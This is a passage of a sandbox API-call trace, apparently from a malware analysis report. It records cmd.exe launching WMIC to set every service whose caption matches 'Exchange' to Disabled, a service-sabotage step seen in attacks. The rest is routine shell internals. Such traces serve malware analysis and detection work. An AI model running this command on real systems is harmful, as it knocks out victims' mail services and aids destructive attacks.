hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x4, lpData=0x450e758*=0x9, lpcbData=0x450e754*=0x4) returned 0x0 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x0, lpData=0x450e758*=0x9, lpcbData=0x450e754*=0x1000) returned 0x2 [0116.464] RegCloseKey (hKey=0x94) returned 0x0 [0116.465] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29825 [0116.465] srand (_Seed=0x5ad29825) [0116.465] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'" [0116.465] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'" [0116.465] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0116.465] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x47a9d68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0116.465] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0116.465] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.465] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0116.465] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0116.465] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0116.465] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0116.465] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0116.465] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0116.465] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0116.465] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0116.465] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0116.465] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0116.465] GetEnvironmentStringsW () returned 0x47a7e10* [0116.465] FreeEnvironmentStringsA (penv="A") returned 1 [0116.465] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.465] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0116.465] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0116.465] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0116.465] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0116.465] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0116.465] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0116.466] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0116.466] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0116.466] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0116.466] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x450f524 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0116.466] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x450f524, lpFilePart=0x450f51c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450f51c*="Desktop") returned 0x1d [0116.466] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0116.466] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x450f2a0 | out: lpFindFileData=0x450f2a0) returned 0x47a05c8 [0116.466] FindClose (in: hFindFile=0x47a05c8 | out: hFindFile=0x47a05c8) returned 1 [0116.466] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x450f2a0 | out: lpFindFileData=0x450f2a0) returned 0x47a05c8 [0116.466] FindClose (in: hFindFile=0x47a05c8 | out: hFindFile=0x47a05c8) returned 1 [0116.466] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0116.466] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x450f2a0 | out: lpFindFileData=0x450f2a0) returned 0x47a05c8 [0116.466] FindClose (in: hFindFile=0x47a05c8 | out: hFindFile=0x47a05c8) returned 1 [0116.466] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0116.466] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0116.466] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0116.466] GetEnvironmentStringsW () returned 0x47a7e10* [0116.466] FreeEnvironmentStringsA (penv="=") returned 1 [0116.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0116.467] GetConsoleOutputCP () returned 0x1b5 [0116.467] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0116.467] GetUserDefaultLCID () returned 0x409 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x450f654, cchData=128 | out: lpLCData="0") returned 2 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x450f654, cchData=128 | out: lpLCData="0") returned 2 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x450f654, cchData=128 | out: lpLCData="1") returned 2 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0116.467] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0116.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0116.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0116.468] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0116.468] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0116.468] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0116.468] GetConsoleTitleW (in: lpConsoleTitle=0x47aab00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.469] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0116.469] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0116.469] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0116.469] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0116.469] GetEnvironmentVariableW (in: lpName="Exchange", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0116.469] _wcsicmp (_String1="Exchange", _String2="CD") returned 2 [0116.469] _wcsicmp (_String1="Exchange", _String2="ERRORLEVEL") returned 6 [0116.469] _wcsicmp (_String1="Exchange", _String2="CMDEXTVERSION") returned 2 [0116.469] _wcsicmp (_String1="Exchange", _String2="CMDCMDLINE") returned 2 [0116.469] _wcsicmp (_String1="Exchange", _String2="DATE") returned 1 [0116.469] _wcsicmp (_String1="Exchange", _String2="TIME") returned -15 [0116.469] _wcsicmp (_String1="Exchange", _String2="RANDOM") returned -13 [0116.469] _wcsicmp (_String1="Exchange", _String2="HIGHESTNUMANODENUMBER") returned -3 [0116.470] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0116.470] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0116.470] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0116.470] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0116.470] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0116.470] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0116.470] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0116.471] GetConsoleTitleW (in: lpConsoleTitle=0x450f340, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.471] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0116.471] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0116.471] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0116.471] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0116.471] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0116.471] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0116.471] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0116.471] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0116.471] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0116.471] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0116.471] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0116.471] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0116.472] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0116.472] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0116.472] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0116.472] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0116.472] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0116.472] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0116.472] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0116.472] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0116.472] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0116.472] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0116.472] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0116.472] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0116.472] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0116.472] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0116.472] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0116.472] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0116.472] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0116.472] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0116.472] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0116.472] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0116.472] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0116.472] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0116.472] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0116.472] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0116.472] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0116.472] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0116.472] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0116.472] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0116.472] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0116.472] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0116.472] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0116.472] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0116.472] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0116.472] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0116.472] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0116.472] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0116.472] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0116.472] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0116.472] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0116.472] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0116.472] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0116.472] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0116.472] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0116.472] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0116.472] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0116.472] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0116.472] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0116.472] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0116.472] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0116.472] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0116.472] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0116.472] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0116.472] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0116.472] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0116.472] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0116.472] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0116.472] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0116.473] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0116.473] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0116.473] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0116.473] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0116.473] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0116.473] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0116.473] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0116.473] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0116.473] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0116.473] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0116.473] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0116.473] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0116.473] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0116.473] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0116.473] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0116.473] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0116.473] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0116.473] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0116.473] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0116.473] SetErrorMode (uMode=0x0) returned 0x0 [0116.473] SetErrorMode (uMode=0x1) returned 0x0 [0116.473] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47a05d0, lpFilePart=0x450ee4c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450ee4c*="Desktop") returned 0x1d [0116.473] SetErrorMode (uMode=0x0) returned 0x1 [0116.473] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0116.473] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0116.478] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.480] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebd8) returned 0xffffffff [0116.480] GetLastError () returned 0x2 [0116.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.480] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebd8) returned 0xffffffff [0116.480] GetLastError () returned 0x2 [0116.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebd8) returned 0xffffffff [0116.480] GetLastError () returned 0x2 [0116.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebd8) returned 0xffffffff [0116.480] GetLastError () returned 0x2 [0116.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebd8) returned 0x47ab2d0 [0116.480] FindClose (in: hFindFile=0x47ab2d0 | out: hFindFile=0x47ab2d0) returned 1 [0116.481] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x450ebd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebd8) returned 0xffffffff [0116.481] GetLastError () returned 0x2 [0116.481] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x450ebd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebd8) returned 0x47ab2d0 [0116.481] FindClose (in: hFindFile=0x47ab2d0 | out: hFindFile=0x47ab2d0) returned 1 [0116.481] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0116.481] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0116.481] GetConsoleTitleW (in: lpConsoleTitle=0x450f0cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.481] InitializeProcThreadAttributeList (in: lpAttributeList=0x450eff8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x450efdc | out: lpAttributeList=0x450eff8, lpSize=0x450efdc) returned 1 [0116.481] UpdateProcThreadAttribute (in: lpAttributeList=0x450eff8, dwFlags=0x0, Attribute=0x60001, lpValue=0x450efe4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x450eff8, lpPreviousValue=0x0) returned 1 [0116.481] GetStartupInfoW (in: lpStartupInfo=0x450f030 | out: lpStartupInfo=0x450f030*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0116.481] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0116.482] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0116.482] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0116.483] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x450ef80*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x450efcc | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x450efcc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf70, dwThreadId=0xf74)) returned 1 [0116.489] CloseHandle (hObject=0xa4) returned 1 [0116.489] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0116.489] GetEnvironmentStringsW () returned 0x47a9f78* [0116.489] FreeEnvironmentStringsA (penv="=") returned 1 [0116.489] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0117.366] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x450ef64 | out: lpExitCode=0x450ef64*=0x0) returned 1 [0117.366] CloseHandle (hObject=0xa8) returned 1 [0117.366] _vsnwprintf (in: _Buffer=0x450f04c, _BufferCount=0x13, _Format="%08X", _ArgList=0x450ef6c | out: _Buffer="00000000") returned 8 [0117.367] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0117.367] GetEnvironmentStringsW () returned 0x47ab400* [0117.367] FreeEnvironmentStringsA (penv="=") returned 1 [0117.367] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0117.367] GetEnvironmentStringsW () returned 0x47ab400* [0117.367] FreeEnvironmentStringsA (penv="=") returned 1 [0117.367] DeleteProcThreadAttributeList (in: lpAttributeList=0x450eff8 | out: lpAttributeList=0x450eff8) [0117.367] _get_osfhandle (_FileHandle=1) returned 0x3c [0117.367] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0117.368] _get_osfhandle (_FileHandle=1) returned 0x3c [0117.368] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0117.368] _get_osfhandle (_FileHandle=0) returned 0x38 [0117.368] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0117.368] SetConsoleInputExeNameW () returned 0x1 [0117.368] GetConsoleOutputCP () returned 0x1b5 [0117.368] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0117.368] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.368] exit (_Code=0) Thread: id = 269 os_tid = 0xf6c Process: id = "59" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x40c6f000" os_pid = "0xf5c" os_integrity_level = 